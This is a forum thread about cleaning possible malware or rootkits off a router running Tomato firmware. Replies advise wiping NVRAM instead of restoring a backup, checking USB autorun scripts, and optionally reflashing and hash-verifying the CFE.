remove Rootkit or other malware?

Discussion in 'Tomato Firmware' started by P2q000, May 14, 2019.

  1. P2q000

    P2q000 Network Newbie Member


    I wish to flash new version with option "After flashing, erase all data in NVRAM memory". I wish to do this to remove potential malware and rootkits.

    I don't wish to loose seetings so will first backup all settings and after flash restore them.


    Will this work?
    What you think? other ways to do it?
  2. eibgrad

    eibgrad Network Guru Member

    Whether it's a good idea to restore from the backup depends on whether the rootkit/malware has or hasn't corrupted nvram as well. Although I know it's a major hassle, when it comes to any firmware updates or rootkit/malware, it's just prudent to reset to factory defaults and rebuild from scratch. In fact, in the case of rootkit/malware, I personally would go so far as to reinstall the firmware too. IOW, wipe absolutely everything and work forward from a known clean state.
    jerrm and M_ars like this.
  3. jerrm

    jerrm Network Guru Member

    Agree with @ebigrad, if you are concerned there has been some sort of malware, then wipe everything. The only thing (easily) writable on the router is NVRAM. For malware to install on the router and persist across a reboot. there are only a few options - rewrite the firmware and/or CFE, modify NVRAM so that scripts are run at startup, place auto-run scripts on USB attached storage.

    NVRAM modification would be the easiest option that would work with any Tomato version. Restoring the backup would likely be restoring any malware scripts. You also need to make sure any autorun scripts on any USB attached storage are clean.

    I don't know of any exploits that rewrite firmware/cfe under Tomato, but that doesn't mean it isn't a possibility,
  4. Monk E. Boy

    Monk E. Boy Network Guru Member

    If you're really paranoid then overwrite the CFE with a known good copy of the CFE, although that will likely require an additional pass through. So first step boot from CFE, erase nvram, flash new firmware, boot into firmware, overwrite CFE, reboot back into CFE, erase nvram, flash new firmware, and then setup from scratch. I will say this though that writing the CFE is very, very, very dangerous. Anything goes wrong and your router will be bricked, no longer work, require a JTAG modification and cable to bring back to life. It's very unlikely the CFE was modified for this reason because it's very easy for it to go sideways.

    In theory after booting into the new firmware for the first time you could read the CFE to a file, copy that file off, then run a MD5/SHA256/etc. on the file that you then compare with the MD5/SHA256/etc. of what should be an identical unmodified CFE of the same version for the same router. Where you would get that CFE is unknown, most of the time the CFEs aren't readily available or at least available from a trustworthy source. Got a retailer nearby with a no-questions-asked return policy who carries the same make/model?

    It is possible they stuffed data into JFFS or the like, but erasing the NVRAM & writing a new firmware should take care of JFFS, since its unlikely the same number of bytes were leftover in flash for jffs to use (unless it was, in fact, the exact same firmware).

    Note however that if you backup all your settings and then restore all your settings via a configuration file, whatever you think is in NVRAM now will go right back into NVRAM because the backup is, quite literally, your NVRAM settings. If you're worried about something surviving from before the wipe the safest option is to set it up by hand as eibgrad suggested.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice